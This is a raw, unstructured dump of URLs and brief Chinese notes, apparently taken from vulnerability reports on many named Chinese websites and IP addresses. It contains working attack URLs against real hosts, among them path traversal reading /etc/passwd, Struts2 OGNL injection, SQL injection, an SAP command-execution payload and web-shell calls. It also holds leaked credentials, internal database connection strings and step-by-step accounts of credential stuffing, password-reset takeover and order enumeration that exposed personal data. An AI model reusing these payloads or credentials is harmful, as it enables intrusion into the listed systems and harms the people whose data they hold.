Id:0;208898 Package:NTLM User:Administrator Domain:WIN-OIB34EHHQ07 Id:0;50394 Package:NTLM http://www.laidingba.com/ http://1.85.2.249/online/web/sale/card/login.jsp http://1.85.2.249/online/sale/card/downloadPage.do?fileName=190.pdf http://**.**.**.**/admin/login.asp?Action=login http://**.**.**.**/ mysql:root http://job.shangdu.com/gnlaowu.php?act=1&city_id=1 http://**.**.**.**:8080/kingdee/disk/uploadProcess.action?parent=1&path=/&user_id=2 http://**.**.**.**:8080/kingdee/disk/upload/1231.jsp http://**.**.**.**:8080/kingdee/login/loginpage.jsp http://**.**.**.**/kingdee/login/loginpage.jsp http://**.**.**.**/nysweb/main/post.php?menu_id=39 http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:oradb http://**.**.**.**/policyquery.aspx?qc=1 http://**.**.**.**/voteDisp.jsp?voteId=15 http://106.120.97.2:7001/etrading/ http://106.120.97.2:7001/console/login/LoginForm.jsp http://106.120.97.2:7001/ma/ma3.jsp jdbc:oracle:thin:@192.168.1.111:1521/orcl http://**.**.**.**/ http://180.153.27.11:7001/ user:tomcat password:china-sss http://www.dh366.com/ http://**.**.**.**/msgShow.aspx?iMark=-1&ListID=859 http://app.m.letv.com:80/android/mindex.phtml?mod=minfo&ctl=videoinfo&act=detail&id=1940748&pcode=130210000&version=1.0 http://**.**.**.**:8888 http://history.citicsinfo.com/login.shtml http://**.**.**.**/HelpList.aspx?guid=8301c423-69f6-4804-89a0-68d1e8dc5a4b http://**.**.**.**/,福建省移民局邮件系统,存在撞库,可用常用用户名和弱口令123456,获得一个有效账号,登陆后,可查看全局用户名,将用户名再做成字典跑,可获得27个有效账号。登陆账号后,可查看工作邮件,某些账号可查看福建省移民局通讯录,不少账号可查看直补移民名单,内含数万人员姓名、地址、身份证号等敏感信息,有的还含有银行卡号。 www.weizhongchou.com http://www.newjobs.com.cn//company/getlogo.aspx www.newjobs.com.cn//search/news_list.aspx www.newjobs.com.cn//search/news_list.aspx http://test.fenjinshe.com/backend/index.php http://ztsj.ztgame.com/stat.php?url= http://drops.wooyun.org/papers/1018 http://58.22.126.106:9000/irm/# http://os.51cto.com:80/ http://gszt2.ztgame.com/article.php?aid=978493&s=19 http://**.**.**.**/phpmyadmin http://**.**.**/lsan/include/login.jsp http://youxi.baidu.com/gjqt/ http://hl.pay.joy.cn/search/playtime.htm?Keyword=-1 http://m005.300188.cn:9080/ http://m005.300188.cn:9080//upload/upload/auth/vedio/1442892486471.jsp http://m005.300188.cn:9080//upload/upload/auth/vedio/1442888390070.jsp?pwd=023&i=whoami http://121.34.249.235/inc/XMLSPRYload/XMLSPRYdepartment.asp?unit=&usetype=0 http://121.34.249.235/sysbug/UpFileForm.asp http://121.34.249.235/sysbug/one.asp https://**.**.**.**/wbs/manager/msg/msg_findMsgsByGuest.do https://**.**.**.**/wbs/news/findNewsListByGuest.do http://119.147.214.215:8097/balance.php?a=exchange_sure http://**.**.**.**:88 http://**.**.**.**:8006/ http://api.daidongxi.com/daidongxi/V2/share/view/orderInfo/00000076***的一个链接,这个链接不能直接在浏览器里打开,要在微信里打开。修改后面的数字,发送到微信的聊天框里,打开,可以看到别人的订单信息,慢慢的遍历,拿到刚刚发货的信息,可以找顺丰客服修改地址的哦。哈哈,就不测试了。没有继续往下挖 http://x.kuwo.cn/KlAnchor/jsp/login.jsp http://www.9666.cn http://oa.hubeidaily.net/EntApp4.0/Login.aspx https://**.**.**.**/fhyfhy17/MyWork/blob/86a6c7eac8cf50e839a4ce018e399d7e26648a33/src/main/resources/conf/email.properties https://**.**.**.**/fhyfhy17/MyWork/tree/86a6c7eac8cf50e839a4ce018e399d7e26648a33/docs https://**.**.**.**/fhyfhy17/MyWork/blob/86a6c7eac8cf50e839a4ce018e399d7e26648a33/src/main/resources/conf/pay.properties http://**.**.**.**:8086/FunctionModule/RoleManagementModule/RoleUserInfoAdd.aspx https://github.com/TryWeiDao/dxl/blob/007085f78fdd9786b3247ccd0b3dae155d0ec9ad/dxl_testing/pay.py http://www.cmstop.com/ http://www.cmstop.cn/ https://cbss.10010.com http://www.chddh.com/bbs/html/20048.html http://tools.2345.com/ http://tools.2345.com:80/ http://**.**.**.**/home/gcxx/now_zyzbgg.aspx http://**.**.**.**/login/wumei/index.jsp https://github.com/xiaoyueer98/pc.rrl.com/blob/32695a23ac1b563f3222a2e84508dc94c7a30bed/ad/ad1/code.php http://zt.ythouse.com/more.php?ztype=15 inurl:health_area_detail.php?id= http://**.**.**.**/06/comm_serv_detail.php?id=5 http://**.**.**.**/comm_serv_detail.php?id=1 http://**.**.**.**/comm_serv_detail.php?id=1 http://**.**.**.**/comm_serv_detail.php?id=1727 http://**.**.**.**/jiannren/comm_serv_detail.php?id=260 http://**.**.**.**/comm_serv_detail.php?id=10 http://**.**.**.**/web/comm_serv_detail.php?id=25 http://**.**.**.**/comm_serv_detail.php?id=29 http://**.**.**.**/comm_serv_detail.php?id=3 http://**.**.**.**/comm_serv_detail.php?id=1 http://**.**.**.**/old/comm_serv_detail.php?id=105 http://**.**.**.**/old/comm_serv_list.php?class_id=2 http://**.**.**.**/jiannren/comm_serv_list.php?class_id=4 http://**.**.**.**/comm_serv_list.php?class_id=3 http://**.**.**.**/comm_serv_list.php?class_id=3 http://**.**.**.**/web/comm_serv_list.php?topage=2&class_id=1 http://**.**.**.**/comm_serv_list.php?class_id=4 http://**.**.**.**/health_area_list.php?class_id=1 http://**.**.**.**/cn/health_area_list.php?class_id=2 http://**.**.**.**/health_area_list.php?class_id=3 http://**.**.**.**/health_area_list.php?class_id=6 http://**.**.**.**/health_area_list.php?class_id=3 http://**.**.**.**/health_area_list.php?class_id=10 http://**.**.**.**/old/health_area_list.php?class_id=2 http://**.**.**.**/jiannren/health_area_list.php?class_id=1 http://**.**.**.**/health_area_list.php?class_id=7 http://**.**.**.**/health_area_list.php?class_id=7 http://**.**.**.**/06/health_area_list.php?class_id=6 http://**.**.**.**/health_area_detail.php?id=43 http://**.**.**.**/old/health_area_detail.php?id=33 http://**.**.**.**/health_area_detail.php?id=31 http://**.**.**.**/health_area_detail.php?id=127 http://**.**.**.**/health_area_detail.php?id=4 http://**.**.**.**/health_area_detail.php?id=127 http://**.**.**.**/cn/health_area_detail.php?id=3 http://**.**.**.**/health_area_detail.php?id=3 http://**.**.**.**/jiannren/health_area_detail.php?id=157 http://**.**.**.**/06/health_area_detail.php?id=15 http://**.**.**.**/doctor_data_list.php?medical_dep_id=7 http://**.**.**.**/06/doctor_data_list.php?sub_dep_id=1 http://**.**.**.**/thop/doctor_data_list.php?sub_dep_id=2 http://**.**.**.**/doctor_data_list.php?medical_dep_id=4 http://**.**.**.**/doctor_data_list.php?sub_dep_id=10 http://**.**.**.**/jiannren/doctor_data_list.php?medical_dep_id=5 http://**.**.**.**/qa_detail.php?id=14 http://**.**.**.**/qa_detail.php?id=50 http://**.**.**.**/qa_detail.php?id=76 http://**.**.**.**/qa_detail.php?id=43 http://**.**.**.**/qa_detail.php?id=15 http://**.**.**.**/site_item_content_7.php?site_map_item_id=101 http://**.**.**.**/ymca/site_item_content_7.php?site_map_item_id=94 http://**.**.**.**/site_item_content_7.php?site_map_item_id=617 http://**.**.**.**/site_item_content_7.php?site_map_item_id=390 http://**.**.**.**/site_item_list_5.php?site_map_item_id=91 http://**.**.**.**/site_item_list_5.php?site_map_item_id=24 http://**.**.**.**/site_item_list_5.php?site_map_item_id=27 http://**.**.**.**/site_item_list_5.php?site_map_item_id=27 http://**.**.**.**/tcc/site_item_list_5.php?topage=2&site_map_item_id=13 http://**.**.**.**/site_item_list_5.php?site_map_item_id=532 http://**.**.**.**/site_item_list_5.php?topage=2&site_map_item_id=48 http://**.**.**.**/site_item_list_5.php?site_map_item_id=1 http://**.**.**.**/site_item_list_5.php?site_map_item_id=13 http://**.**.**.**/medical_serv_list.php?article_id=3 http://**.**.**.**/medical_serv_list.php?article_id=2 http://**.**.**.**/medical_serv_list.php?article_id=3 http://**.**.**.**/medical_serv_list.php?article_id=3 http://**.**.**.**/06/medical_serv_list.php?article_id=9 http://**.**.**.**/medical_serv_list.php?article_id=2 http://**.**.**.**/admin.php http://**.**.**.**/phpMyAdmin/ http://**.**.**.**/1.php 也删了吧 http://**.**.**.**/p.php http://**.**.**.**/,weblogic的UDDI页面泄露,导致可以探测内网信息。 http://**.**.**.**/uddiexplorer/SearchPublicRegistries.jsp, http://store.sf-express.com/index.html http://123.58.179.90:8983/solr/#/~logging https://gitlab.ws.netease.com/explore/projects http://**.**.**.**/index.php?m=member&c=index&a=account_manage_avatar&t=1 http://**.**.**.**/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=b0adVAhUVlUCAAUFUg5TB1MJDFNSBFFbUlADVApAXwEFVBYUSzsHEEZYal4HTww0MXFgMQ8eM1wrBGwHRFdBE08MQFZeHBEiSHdARVQBZw http://**.**.**.**/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=228cVVVRBQUDVgIDVAFSVFQJVAAIVwRbBVUCWFxHDFQMAx8VFj5UQEcObVgBQA1nNnE4YlVNZlx8AW0LElASRkZbSVcDGUJySSFHQ1IOZg http://**.**.**.**/index.php?m=dbsource&c=call&a=get&id=9 http://www.zzvcom.com/.svn/entries http://www.zzvcom.com/cms/admin/login.action http://**.**.**.**/News/NewsSearch.aspx?Search=a http://ses.sf-express.com/RecoveryPassword.aspx http://bj.feiren.com/gul2/?act=create&category=*&mod=news http://register.csairholiday.com/casUserManager/user/reset.do?mhd=resetpassword https://**.**.**.**/por/login_psw.csp www.51tr.com/zixunlist.php?class=8 http://127.0.0.1/1.html,代码如下: http://www.qq.com http://git.team.cnblogs.com/zhangkun/CNBlogsApp/tree/master/CNBlogsApp/CNBlogsApp url:http://**.**.**.**/news_content.php?id=3087 http://59.175.217.206/cloudstor/ http://59.175.217.204/EntApp4.0/Login.aspx http://59.175.217.202/login/Login.aspx?color=Blue http://www.changan-mazda.com.cn/mediareports/index?page=2&year=1 http://www.metromall.cn/account/addressinfo.aspx?ContactorID=7219 www.metromall.cn www.baidu.com/link%3Furl%3DoPyiQ3wJGqEF3KdVTLEge0VjRCUb7dCReJ3VwCp2vPX5YyDxC1Oe2xuaT2mz3FZO%26wd%3D%26eqid%3Db3fc0e9e000101010000000556013a31 www.metromall.cn/ http://www.metromall.cn/account/addresslist.aspx http://**.**.**.**/ http://www.bizcn.com/login?module=memberzone www.bizcn.com http://www.changan-mazda.com.cn/search?q=1* www.touzhu.cn/news/newslist/*/_1.html www.touzhu.cn/customer/ajax_findpass.php/actionc=checknickname&nickname=*&suijishu=0.10779594886116683&username=e http://www.touzhu.cn:80/ DC1506772BE8531E2289EA15456B3920:FG=1 www.touzhu.cn bj.feiren.com/tour/?id=51&idtype=*&limit=12&mod=comment http://chana-mazda.dma.cig.com.cn/index http://**.**.**.**/siteserver/login.aspx http://www.51bi.com/bbs/ URL:http://**.**.**.**/page/infoc.jsp?id=5058 http://**.**.**.**/commix/product/article_info.jsp?contentId=405 http://**.**.**.**:8080/ http://photo.uestc.edu.cn/image.php?path= http://photo.uestc.edu.cn/image.php?path=/etc/passwd http://photo.uestc.edu.cn/image.php?path=/var/www/admin/application/config/database.php http://**.**.**.**/party/listAction!listTB_XXFB_Djkw.action?type=djkw_type www.auto.uestc.edu.cn/examples/servlets/servlet/SessionExample http://www.haijia.com.cn/ http://www.haijia.com.cn/admin,但是没有用户名密码,wtf http://**.**.**.**/ cd:56:dd http://www.eapchina.net/lenovo/ http://**.**.**.**/)登录页面存在验证码设计缺陷,存在爆破风险。 https://**.**.**/por/service.csp http://eservice.foxconnchannel.com/ jdbc:oracle:thin:@**.**.**.**:1521:fzjf1 http://www.med66.com/,如图所示: http://test.med66.com/national/login/view.do?op=goLogin,如图所示: http://qz.med66.com/QUIZ/login/goLogin.action,如图所示: http://test.med66.com/examweb/zhengshi/paper/paperView.jsp http://test.med66.com/examweb/deqin/paper/paperView.jsp http://test.med66.com/examweb/exercise/paper/paperView.jsp http://test.med66.com/examweb/zhengshi/paper/paperView.jsp https://123.127.254.80/por/login_psw.csp http://ijiaxiaoqu.foxconn.com/ http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=%E8%88%B9%E4%B8%9C%E4%BB%A3%E8%A1%A8 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=00020&v_positionOne=00020&v_positionTwo=&v_positionThree=&v_hopeAddress=2002&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key= http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=%E7%BE%8E%E7%94%B2%E5%B8%88 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=%E9%87%87%E8%B4%AD%E4%B8%BB%E7%AE%A1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=CAD http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=1 http://**.**.**.**/jobseeker/stage/Search_Result.aspx?v_Industry=&v_positionCategory=&v_positionOne=&v_positionTwo=&v_positionThree=&v_hopeAddress=&v_positionDateCode=&v_degreeCode=&v_experienceCode=&v_salary=0&v_companyProperty=&v_key=88 http://signliba.liba.com/.svn/entries http://images.ellechina.com/.svn/entries http://oa.998.com/homepage/LoginHomepage.jsp?hpid=21 http://sqlmap.org http://inner.800bestex.com:8090/manage/index.jsp http://inner.800bestex.com:8090/admin/index.jsp http://inner.800bestex.com:8090/newsManage.do?method=getDepList&resultPage=getDepPage http://oa.mfc.com.cn:81//page/maint/login/Page.jsp?templateId=18 https://**.**.**.**/prx/000/http/localhost/login http://**.**.**.**:88/skxy/front/vote!showById.action http://**.**.**.**/hkwx/loginController.do?login https://221.133.237.231/prx/000/http/localhost/welcome www.zgrljyw.com/wshwpt.php_ http://cp.super8.com.cn/Hotel/List http://cp.super8.com.cn/ https://**.**.**.**/prx/000/http/localhost/login http://**.**.**.**/bugs/wooyun-2010-0121304 http://**.**.**.**/bugs/wooyun-2010-0121058 http://**.**.**.**/pkpmbs/jdmanage/standingbookTjlist.aspx?SUBMIT_TYPE=0&queryid=1&lzstat_uv=34338219962842780482|1738820&__back2accountQueryList=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/jdmanage/standingbookTjlist.aspx?SUBMIT_TYPE=0&queryid=1&lzstat_uv=34338219962842780482|1738820&__back2accountQueryList=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/jdmanage/standingbookTjlist.aspx?SUBMIT_TYPE=0&queryid=1&lzstat_uv=34338219962842780482|1738820&__back2accountQueryList=/pkpmbs/jdmanage/AccountQueryList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/mall-web/busiNotice/list右下角有个在线实名验证的网站,需要调整地区为广东才能看到。 http://**.**.**.**/bugs/wooyun-2014-088669就能拿到189W+公民姓名,身份证和家庭住址。 http://update.968309.com/.svn/entries http://m.lib.tsinghua.edu.cn/thulibxhtml/jsp/innopac/booksearch_1.jsp?bookfield=t&searchscope=5&bookkeyword=ddddddd&sortorder=-&numperpage=10&flag=Y url:http://**.**.**.**/list.php?id=110 http://**.**.**.**/list.php?id=110 www.job168.com url:http://**.**.**.**/News/NewsSearch.aspx?Search=1 http://admin.cbnweek.com/index.php?url=../../../../../../../../../../etc/passwd%00.jpg http://113.16.174.145:8808/system/login!login.action http://113.16.174.145:8808/guige.jsp http://service.sflep.com:80/ http://**.**.**.**:8081/ShowDetail.aspx?d=1018&id=XWHUST201305210000018201&m=XWHUST201305210000018201%27and%20%271%27=%2712&t=%E5%85%B3%E4%BA%8EM~2%E5%8F%82%E6%95%B0%E7%9A%84%E7%A0%94%E7%A9%B6%27&y=2000%27 http://**.**.**.**/ShowDetail.aspx?d=1016&id=QKC20152015062500049869&m= http://**.**.**.**:8080/ShowDetail.aspx?d=1020&id=SNAD000001499225&m=SNAD000001499225&t=AK%20M%E7%B3%BB%E5%88%97%E7%9B%98%E5%BC%8F%E5%89%8D%E8%BD%AC%E5%90%91%E6%A1%A5%E6%80%BB%E6%88%90&y= http://**.**.**.**/ShowDetail.aspx?d=1020&id=91218739&m= http://www.968309.com/yinyitong/index.html http://58.215.43.21:8080/ http://58.215.43.21:8080/invoker/JMXInvokerServlet http://act.vip.xunlei.com/waplogin/login.html?url=http%3A%2F%2Fjifen.xunlei.com%2Fweixinservice%2Fexchanges%2F http://act.vip.xunlei.com/kfweixin/?openId=orWeAjsn10Nin0w0vq7wPgbfbrrE&createTime=1442980310&sign=ce4abe537b8f2b1646ed6b4aadfea203 http://**.**.**.**/autoclaim/ http://**.**.**.**/autoclaim/jsp/picture/picture_stream.jsp http://**.**.**.**/autoclaim/jsp/picture/picture_stream.jsp?filep=/../../../../../../../../../../../../etc/passwd https://www.wzdai.com/gyb/trade/allTrade.html?page=null&order=1&projectName=all&username=e&priceArea=0&tradeToken=%20&callback=jQuery1113033065438410267234_1442924018943 http://mdm.digitalchina.com:8080/ http://zhifu.mobage.cn http://**.**.**.**/Dept/news.jsp?item_id=100605 http://**.**.**.**/web/index.html http://d.968309.com/ http://219.143.213.189/newlogon.aspx http://supplier.digitalchina.com/jsp/Logout.jsp http://202.108.145.38:8080/j_security_check http://202.108.145.246/ http://**.**.**.**/search.asp http://m.mfa.go.th/ajax/ajaxOrgMember.php?dID=N,遍历N即可(我遍历到了300) http://www.968309.com/ http://www.968309.com/user.php?act=opc_order_detail&opcorder=OPCO201303040000000211 http://www.968309.com/user.php?act=opc_order_detail&opcorder=OPCO201509220000000201 http://www.968309.com/user.php?act=opc_order_detail&opcorder=OPCO201509250000000002 http://minanins.com/maechannel/ebiz/index.do http://e-policy.minanins.com/prod/grzh.html http://58.60.230.90/ URL:http://m.lvmama.com/static/zt/3.0.0/1508/guoqing/?from=timeline&isappinstalled=1 username:6bazx25 password:123456 http://**.**.**.**/news.asp?tid=21 http://**.**.**.**/epiao/busSearch.do url:http://robot.dev.game.yy.com/errorlog/index.do http://ba.51web.com/ http://ba.51web.com http://**.**.**.**/android/info/300002742389.html http://service.hotwater.com.cn:8099/login.asp http://service.hotwater.com.cn:8099/repair/ReturnDemand.asp?startdate=2011-5-21&enddate=2015-6-20&teamid=4B917&ope=1 http://service.hotwater.com.cn:8099/CCCByInstTeam/WebForm1.aspx?insteamid=4A660 http://service.hotwater.com.cn:8099/query/QueryAccountAddress_Save.asp?accountid=150312000757 http://service.hotwater.com.cn:8099/CCCByInstTeam/Present_apply.aspx?userid=Q3TR8A00BKGK http://service.hotwater.com.cn:8099/CCCByInstTeam/WebDDYPJ.aspx?userid=QHT5VA001WA4 http://**.**.**.**/,如图所示: http://**.**.**.**/client/clientLoginAction_loginUI.action,如图所示: http://mla.hotwater.com.cn/sdyd http://mla.hotwater.com.cn/manager/html http://mail189.dooland.com/cp_brand.php?id=39 http://g.91huayi.com:80/ http://www.zzvcom.com/.svn/entries svn://192.168.13.10/svn/PSIP1.0/Code/CMS_5.1/web/ROOT.war svn://192.168.13.10/svn/PSIP1.0 svn:special svn:externals svn:needs-lock http://**.**.**.**/admin/OALogin https://**.**.**.**/存在弱口令 https://**.**.**.**/存在弱口令 http://**.**.**.**/user/Home.action http://**.**.**.**/autoclaim http://**.**.**.**/autoclaim/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../jsp/manager http://**.**.**.**/autoclaim/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://www.4over6.edu.cn/upload.php http://www.4over6.edu.cn/imageSample/20150922222052mail.php URL:http://www.lvmama.com/zt/promo/shiyi7/#dianPin http://180.153.176.55:8080 http://crm.haolyy.com/ http://api.acfun.tv/apiserver/profile?userId=967910 http://www.ourteacher.com.cn/admin/,进入后台可上传ashx文件,利用ashx生成asp,可写入任意代码 http://**.**.**.**:80/login.aspx http://**.**.**.**:8083/QiKanEng_ShouYe.aspx?journalId=EnJour00092466&y=2005 http://**.**.**.**:8080/QiKanEng_ShouYe.aspx?journalId=EnJour00013278 http://**.**.**.**/QiKanEng_ShouYe.aspx?journalId=EnJour00092466 http://**.**.**.**:8100/QiKanEng_ShouYe.aspx?journalId=EnJour00092466 http://**.**.**.**/QiKan_ShouYe.aspx?journalId=J0389 http://**.**.**.**:8090/QiKan_ShouYe.aspx?journalId=J01478 http://**.**.**.**:8100/QiKan_ShouYe.aspx?journalId=J01149 http://**.**.**.**:8083/QiKan_ShouYe.aspx?journalId=J01478 http://**.**.**.**:8080/QiKan_ShouYe.aspx?journalId=J01339 http://202.96.11.40/Citrix/XenApp/site/default.aspx?CTX_MessageType=SUCCESS&CTX_MessageKey=UsableClientDetected user:test pass:test进去了 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://**.**.**.**/Web_Org/TCH_list.aspx?typeid=9 http://219.139.240.89:321 http://219.139.240.89:6801 http://eps.zzvcom.com/custom/groupnewslist.aspx?buyGroupId=&child=true&groupId=149 http://**.**.**.**/ http://**.**.**.**:8080/irj/portal/ http://**.**.**.**:8080//ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=id http://*/autoclaim/jsp/picture/picture_stream.jsp http://**.**.**.**/autoclaim/jsp/picture/picture_stream.jsp http://**.**.**.**/autoclaim/jsp/picture/picture_stream.jsp?filep=/../../../../../../../../../../../../etc/passwd http://**.**.**.**/STRCWeb/index.jsp?module=RegCenter&id=show&serial=EF3E7A6B-41B5-4CF0-95D1-B1B493726EA6&chuan=1 http://office.mingyi.com.cn/txl/manage/login.aspx http://**.**.**.**/column.php?column=%E5%85%A8%E6%99%BA%E8%B4%A4%E5%90%8C%E6%AC%BE&type=women http://www.jiuhuashan.cc/expand_ticket/?tcid=4 http://121.8.169.133/search_cata.aspx http://dv.56.com/ http://**.**.**.**/ POSThttp://**.**.**.**/test.aspx http://**.**.**.**/通过跑一处链接,跑到支付官网的数据库,跑了下会员表,近3W会员 http://ctrl.69shequ.com/qbadmin/menu/baseSet http://zijia.lvmama.com http://**.**.**.**/ http://**.**.**.**/uf http://**.**.**.**/uf/Uploads/MemberData/ http://**.**.**.**:80/ cgP9W8BOY4yg6UXdsNgPHY:13nc2bp3u http://**.**.**.**/case/caselist.aspx http://**.**.**.**/myorder.aspx http://**.**.**.**/myorder.aspx http://**.**.**.**/myorder.aspx http://**.**.**.**/myorder.aspx https://**.**.**.**/bulletlu/meyes-server/blob/2297f669cd1b095a151580d10d75d755b2db52fc/src/main/resources/server.properties http://www.state-dr.com/viewproduct.php?productid=304 http://sywsw.91huayi.com/Page/InfoView.aspx?lm=ZCXX&id=54 http://**.**.**.**/account/regstep1 http://**.**.**.**/account/findpwd?from=http://**.**.**.**/ http://**.**.**.**/account/resetpwd?email=2602462006@**.**.**.**&gid=5b754e490080cc4b&from=http://**.**.**.**/ URL:http://ssp.baidu.com//ce.wooyun.org http://ssp.baidu.com= http://ssp.baidu.com/home http://ssp.baidu.com,网站会跳转到/home页面,但HOST值是从最后一个//后取的而不是第一个// http://ssp.baidu.com后面加上//然后再加任意站点都可以跳转,当然正常打开的前提是跳转的站点要有/home这个页面 http://**.**.**.**/News/Detail.aspx?NewsID=1173&ModuleNo=0301 http://**.**.**.**/News/Detail.aspx?NewsID=1173%27%20and%20%27%27=%27&ModuleNo=0301 http://**.**.**.**/News/Detail.aspx?NewsID=1173%27%20and%20%271%27=%27&ModuleNo=0301 http://www.tjsoc.com/ http://www.tjsoc.com:80/ http://**.**.**.**/ ipsec.bak/tun/add_tun_write.php ipsec.bak/usertun/add_tun_write.php root:/bin/csh Superuser:/root processes:/root:/usr/sbin/nologin Source:/:/usr/sbin/nologin Sandbox:/:/usr/sbin/nologin Sandbox:/:/usr/sbin/nologin pseudo-user:/usr/games:/usr/sbin/nologin Subsystem:/:/usr/sbin/nologin Pages:/usr/share/man:/usr/sbin/nologin Daemon:/var/empty:/usr/sbin/nologin User:/var/spool/clientmqueue:/usr/sbin/nologin User:/var/spool/mqueue:/usr/sbin/nologin Sandbox:/:/usr/sbin/nologin pseudo-user:/nonexistent:/usr/sbin/nologin user:/var/empty:/usr/sbin/nologin programs:/var/empty:/usr/sbin/nologin pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico Owner:/nonexistent:/usr/sbin/nologin Owner:/nonexistent:/usr/sbin/nologin user:/nonexistent:/usr/sbin/nologin ipsec.bak/tun/add_tun_write.php ipsec.bak/tun/wooyun.txt cd:56:d7 http://**.**.**.**/ http://**.**.**.**/ http://115.29.202.192:7001/prlife-jfmall/index.shtml http://jifen.prlife.com.cn/prlife-jfmall/test.jsp jdbc:oracle:thin:@115.29.200.242:1521:dev jdbc:oracle:thin:@115.29.200.242:1521:dev jdbc:oracle:thin:@115.29.200.242:1521:dev jdbc:oracle:thin:@**.**.**.**:1521/bjdc http://**.**.**.**/index.html http://**.**.**.**:801/ http://**.**.**.**:801/messager/users.data http://www.spider.com.cn/forgetPassword.html,输入想要重置的邮箱,点击“下一步”,抓包,记录响应包中的长串字符串,再用自己已经注册账号正常进行找回密码,进入自己邮箱,找回密码链接为http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=599748&spsign=34025FBB8751D3F6F443DB128F4223A3F8BB2012E09BD5E8&sign=2AF2***************************C9D,将直接记录下的字符串代入sign,就可以重置想要修改密码的账号,这里我将admin@qq.com账号的密码修改成了admin123456,将官方客服账号kf@spider.com.cn的密码修改成了kf123456。 http://**.**.**.**:9010/web http://**.**.**.**:9010/main http://**.**.**.**:9012 http://**.**.**.**/Reception/evaluation-1.html http://study.**.**.**.**/myPaper/dk_ShowImage.aspx?ModuleID=103&srId=470 http://cmnerm.minmetals.com.cn http://cmnerm.minmetals.com.cn/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL http://**.**.**.**/ http://www.zzvcom.com/cms/admin/index.action http://www.zzvcom.com/cms/admin/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://**.**.**/ http://**.**.**/ http://www.sanhao.com/orderpay.php?id=109&course=31043&cnum=1,参数course存在注入,此处直接加and语句会提示“请求存在安全风险”,经过测试,发现没有过滤掉"/",“/”下面“case http://ptmes.saicmotor.com/ http://ptmes.saicmotor.com:9090/ http://ess.cninsure.net/portal/product/get_product_list!initRiskList.action?area=110000&pageSize=12&producttype=1 http://61.161.193.183:81/ http://61.161.193.183:81 http://portal.mobage.cn/index.php?c=user_basic&m=dochange_password http://119.15.138.114:8000/bin/?phpinfo=1 http://119.15.138.114:8000/html/ http://119.15.139.55:8000/search http://119.15.139.103:8002/ http://home.dongfeng.net/ http://home.dongfeng.net/as/upimg.asp http://**.**.**.**/.git https://nfltc.sflep.com:443/index.php?Itemid=10&torscatid=2&option=com_rubberdoc&view=list https://ad.sflep.com:443/index.php?Itemid=10&limitstart=30&torscatid=1&option=com_rubberdoc&view=list https://m.sflep.com:443/index.php?Itemid=10&limitstart=30&torscatid=1&option=com_rubberdoc&view=list 